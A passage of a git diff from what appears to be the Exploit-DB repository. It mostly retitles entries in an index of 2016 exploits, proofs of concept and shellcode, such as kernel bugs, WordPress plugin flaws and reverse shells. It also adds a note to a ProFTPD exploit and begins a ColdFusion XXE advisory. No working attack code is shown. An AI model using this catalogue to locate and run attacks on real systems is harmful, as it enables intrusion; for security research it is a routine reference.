IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 -39381,platforms/osx/dos/39381.c,"Apple Mac OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39365,platforms/multiple/dos/39365.c,"Apple Mac OSX / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS - Kernel iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 +39367,platforms/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39368,platforms/osx/dos/39368.c,"Apple Mac OSX - gst_configure Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 +39369,platforms/osx/dos/39369.c,"Apple Mac OSX - IntelAccelerator::gstqConfigure Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39370,platforms/osx/dos/39370.c,"Apple Mac OSX - Kernel Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39377,platforms/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 +39378,platforms/multiple/dos/39378.c,"Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 +39379,platforms/multiple/dos/39379.txt,"Apple Mac OSX / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39380,platforms/osx/dos/39380.c,"Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39381,platforms/osx/dos/39381.c,"Apple Mac OSX - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39384,platforms/php/webapps/39384.txt,"WordPress Simple Add Pages or Posts Plugin 1.6 - Cross-Site Request Forgery",2016-01-29,ALIREZA_PROMIS,php,webapps,0 @@ -35662,7 +35668,7 @@ id,file,description,date,author,platform,type,port 39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,multiple,webapps,0 39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80 39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80 -39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 +39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted Arbitrary File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80 39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80 39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0 39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0 @@ -35822,7 +35828,7 @@ id,file,description,date,author,platform,type,port 39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0 -39595,platforms/multiple/local/39595.txt,"Apple Mac OS X / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 +39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 @@ -35835,16 +35841,16 @@ id,file,description,date,author,platform,type,port 39604,platforms/multiple/dos/39604.txt,"Wireshark - dissect_ber_integer Static Out-of-Bounds Write",2016-03-23,"Google Security Research",multiple,dos,0 39605,platforms/windows/dos/39605.txt,"Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation",2016-03-23,"Google Security Research",windows,dos,0 39606,platforms/windows/dos/39606.txt,"Comodo AntiVirus - Heap Overflow in LZX Decompression",2016-03-23,"Google Security Research",windows,dos,0 -39607,platforms/osx/dos/39607.c,"Apple Mac OS X - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 +39607,platforms/osx/dos/39607.c,"Apple Mac OSX - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort",2016-03-23,"Google Security Research",osx,dos,0 39608,platforms/windows/dos/39608.txt,"Adobe Flash - Shape Rendering Crash",2016-03-23,"Google Security Research",windows,dos,0 39609,platforms/windows/dos/39609.txt,"Adobe Flash - Zlib Codec Heap Overflow",2016-03-23,"Google Security Research",windows,dos,0 39610,platforms/windows/dos/39610.txt,"Adobe Flash - Sprite Creation Use-After-Free",2016-03-23,"Google Security Research",windows,dos,0 39611,platforms/windows/dos/39611.txt,"Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39612,platforms/windows/dos/39612.txt,"Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 39613,platforms/windows/dos/39613.txt,"Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix",2016-03-23,"Google Security Research",windows,dos,0 -39614,platforms/osx/dos/39614.c,"Apple Mac OS X - Kernel AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 -39615,platforms/osx/dos/39615.c,"Apple Mac OS X - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 -39616,platforms/osx/dos/39616.c,"Apple Mac OS X - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 +39614,platforms/osx/dos/39614.c,"Apple Mac OSX - Kernel AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0 +39615,platforms/osx/dos/39615.c,"Apple Mac OSX - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 +39616,platforms/osx/dos/39616.c,"Apple Mac OSX - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 39623,platforms/php/webapps/39623.txt,"WordPress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 @@ -35862,11 +35868,11 @@ id,file,description,date,author,platform,type,port 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 -39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin) Exploit",2016-03-31,LiquidWorm,hardware,webapps,80 +39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin)",2016-03-31,LiquidWorm,hardware,webapps,80 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 -39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 +39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Microsoft Windows - Kernel Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Microsoft Windows - Kernel NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 @@ -35905,7 +35911,7 @@ id,file,description,date,author,platform,type,port 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 -39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088 +39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload",2016-04-13,"Zhou Yu",jsp,webapps,8088 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload",2016-04-13,Metasploit,unix,remote,0 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0 @@ -35999,19 +36005,19 @@ id,file,description,date,author,platform,type,port 39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 -39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite (PoC)",2016-05-09,"Nipun Jaswal",windows,dos,0 +39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-09,"Nipun Jaswal",windows,dos,0 39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution",2016-05-09,Metasploit,ruby,remote,3000 39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos,0 -39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0 +39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0 39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21 39798,platforms/hardware/webapps/39798.txt,"Multiple JVC HDRs and Net Cameras - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0 39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0 39801,platforms/android/dos/39801.c,"Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0 -39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field SEH Overwrite (PoC)",2016-05-11,"Nipun Jaswal",windows,dos,0 +39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",windows,dos,0 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 @@ -36090,7 +36096,7 @@ id,file,description,date,author,platform,type,port 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 -39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin Exploit)",2016-06-06,"Ali Ghanbari",php,webapps,80 +39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80 @@ -36126,17 +36132,17 @@ id,file,description,date,author,platform,type,port 39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution",2016-06-10,Metasploit,cgi,remote,444 39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution",2016-06-10,Metasploit,multiple,remote,8080 -39920,platforms/osx/dos/39920.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 +39920,platforms/osx/dos/39920.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 -39922,platforms/osx/dos/39922.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 -39923,platforms/osx/dos/39923.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 -39924,platforms/osx/dos/39924.c,"Apple Mac OS X - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 -39925,platforms/osx/dos/39925.c,"Apple Mac OS X - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 -39926,platforms/osx/dos/39926.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 -39927,platforms/osx/dos/39927.c,"Apple Mac OS X - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 -39928,platforms/osx/dos/39928.c,"Apple Mac OS X - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 -39929,platforms/multiple/dos/39929.c,"Apple Mac OS X / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 -39930,platforms/osx/dos/39930.c,"Apple Mac OS X - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 +39922,platforms/osx/dos/39922.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 +39923,platforms/osx/dos/39923.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 +39924,platforms/osx/dos/39924.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 +39925,platforms/osx/dos/39925.c,"Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 +39926,platforms/osx/dos/39926.c,"Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 +39927,platforms/osx/dos/39927.c,"Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 +39928,platforms/osx/dos/39928.c,"Apple Mac OSX - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 +39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 +39930,platforms/osx/dos/39930.c,"Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 @@ -36173,7 +36179,7 @@ id,file,description,date,author,platform,type,port 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 -39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 +39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 @@ -36203,7 +36209,7 @@ id,file,description,date,author,platform,type,port 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80 40111,platforms/php/webapps/40111.txt,"Joomla Guru Pro (com_guru) Component - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 -40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit)",2016-06-22,s0nk3y,php,remote,80 +40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80 40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80 @@ -36293,7 +36299,7 @@ id,file,description,date,author,platform,type,port 40181,platforms/linux/dos/40181.c,"AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak",2016-07-29,"Google Security Research",linux,dos,0 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 -40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0 +40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0 @@ -36304,7 +36310,7 @@ id,file,description,date,author,platform,type,port 40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Privilege Escalation (2)",2016-07-20,LiquidWorm,multiple,webapps,8088 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin Cross-Site Request Forgery",2016-07-20,LiquidWorm,multiple,webapps,8088 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting",2016-07-20,LiquidWorm,multiple,webapps,8088 -40136,platforms/linux/remote/40136.py,"OpenSSHD 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 +40136,platforms/linux/remote/40136.py,"OpenSSHD 7.2p2 - 'Username' Enumeration",2016-07-20,0_o,linux,remote,22 40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 @@ -36375,7 +36381,7 @@ id,file,description,date,author,platform,type,port 40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 -40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) Cross-Site Request Forgery",2016-08-08,"Edwin Molenaar",php,webapps,80 +40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 diff --git a/platforms/linux/remote/15449.pl b/platforms/linux/remote/15449.pl index 7f93cad5c..041945e95 100755 --- a/platforms/linux/remote/15449.pl +++ b/platforms/linux/remote/15449.pl @@ -1,6 +1,8 @@ # Exploit Title: ProFTPD IAC Remote Root Exploit # Date: 7 November 2010 # Author: Kingcope +# +# E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563. use IO::Socket; diff --git a/platforms/multiple/webapps/40346.py b/platforms/multiple/webapps/40346.py new file mode 100755 index 000000000..707f88137 --- /dev/null +++ b/platforms/multiple/webapps/40346.py @@ -0,0 +1,572 @@ +''' +============================================= +- Discovered by: Dawid Golunski +- http://legalhackers.com +- dawid (at) legalhackers.com + +- CVE-2016-4264 +- APSB16-30 +- Release date: 31.08.2016 +- Severity: Critical +============================================= + + +I. VULNERABILITY +------------------------- + +Adobe ColdFusion <= 11 XML External Entity (XXE) Injection + + +II. BACKGROUND +------------------------- + +"Adobe ColdFusion 11 Enterprise Edition offers a single platform to +rapidly build and deploy scalable, high-performing web and mobile +applications. Leverage unique capabilities to develop, test, and debug +mobile applications end to end. Generate high-quality PDF files and +manipulate them easily." + +http://www.adobe.com/products/coldfusion-family.html + +ColdFusion is widely deployed. A google search for a ColdFusion index file +(index.cfm) exposes over 30 million websites of various sectors that make use +of ColdFusion platform in a 